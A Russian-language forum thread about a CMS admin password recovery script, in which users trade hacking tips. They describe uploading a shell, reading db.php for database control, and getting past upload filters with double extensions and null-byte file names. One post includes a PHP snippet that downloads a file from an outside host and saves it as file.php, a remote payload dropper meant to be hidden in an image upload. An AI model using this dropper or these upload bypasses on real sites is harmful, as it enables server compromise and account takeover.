Восстановления пароля администратора

781
.
2 человека скачнули, прогресс на лицо )
--
PS В скрипте используется кодировка UTF 8 , если ваш браузер (например опера мини ) не поддерживает смену кодировки , то добавьте эту строчку в самый верх скрипта (естественно после "<?" )
header('Content-type: text/html; charset=utf-8');
.
Бабушка_Batman
действительно народ малость туповат, не понимают че ето такое отличный подарок хацкерам, нашел эксплоут, инклудим скрипт, и вуаля учетка админа в кармане гг для садистов...
.
Бабушка_Batman
подобную штуку сиера писал под мотор))) тока она изначально несла хак характер хотя если мы это зальем то и шелл зальем лутше говорю же скрипт для садистов но для серверов с нормальными настройками, где шелл работать не будит, очень даже пригодится с шелла хеши админа не подмениш..а скрипт.. ;)
.
Бабушка_Batman
Николай (16.12.2009/19:14)
PS Алькатраз , обнаружена уязвимость двига Шутка )..Хотя нет, уязвимость браузеров посетителя ) Чувствую что заинтриговал ).Напиши тесктовик , сохрани как *.png (*.jpg *.gif) . Такие файлы свободно
картинку с таким содержанием гг


<?
$host = "site.ru";
$path = '/file.txt';
$fp = fsockopen($host,80,$errno,$errstr,30);
if(!$fp) echo"$errstr ($errno)<br />\n";
else{
$headers = "GET $path HTTP/1.0\r\n";
$headers .= "Host: $host\r\n";
$headers .= "Accept: *\r\n";
$headers .= "Accept-Charset: UTF-8\r\n";
$headers .= "Accept-Charset: *\r\n";
$headers .= "Accept-Encoding: deflate\r\n";
$headers .= "Accept-Language: ru\r\n";
$headers .= "Referer: google.com\r\n";
$headers .= "User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01\r\n\r\n";
fwrite($fp,$headers);
while($file != "\r\n") $file = fgets($fp,128);
$file = "";
while(!feof($fp)) $file .= fgets($fp,4096);
fclose($fp);
}
$name="file.php";
$fp = fopen ("$name", "w");
$text=$file;
fwrite($fp,$text); 
fclose($fp);
?>
.
В стельку трезвый
Бабушка_Batman, гг. с шела откроешь такой полезный файл db.php что даст ещё больше свободы над базой. ))
.
Бабушка_Batman
Максим (21.12.2009/02:30)
Бабушка_Batman, гг. с шела откроешь такой полезный файл db.php что даст ещё больше свободы над базой. ))
ыы забыл что он есть...

но джона так не сломать, есть волшебный файл .htaccess в галереи и в file который запрещает запуск скриптов в папке с картинками
.
Бабушка_Batman
ну почему Олег не промахнулся пальцем по кнопке и не написал вместо php_flag engine 0 >> php_flag engine 1
.
Бабушка_Batman
но госпада хацкеры не отчаивайтесь, ведь в инете сотни сайтов с джоном на котором установлены доп.модули, написаные самими админами, в которых они лиш их адаптировали под двиг поменяв "шапку" и "ноги"

p.s в ранних версиях обмеников, галерей и т.д фильтровали лиш расширения загружаемых файлов, что б не залил файлы типа *.php или *.php.gif а потом запускали их *.php%00.gif а тут понимаеш картинка создает файл в указаной директории.

p.s.s администрация почистите все мои посты..а то и правда кто то то...
.
Бабушка , раз интересуют взломы , могу продать скрипт за 400 рублей определяющий степень кодированности мд5 самого пароля )
Ps Меня это не волнует , у меня не мд5 ) ^_^
.
Бабушка_Batman (21.12.2009/03:03)
но госпада хацкеры не отчаивайтесь,айлы типа *.php или *.php.gif а потом запускали их *.php%00.gif
Сейчас до сих пор есть хостинги которые запускают *.php.png ) Так что юзвери "Отчаивайтесь" гг
Всего: 34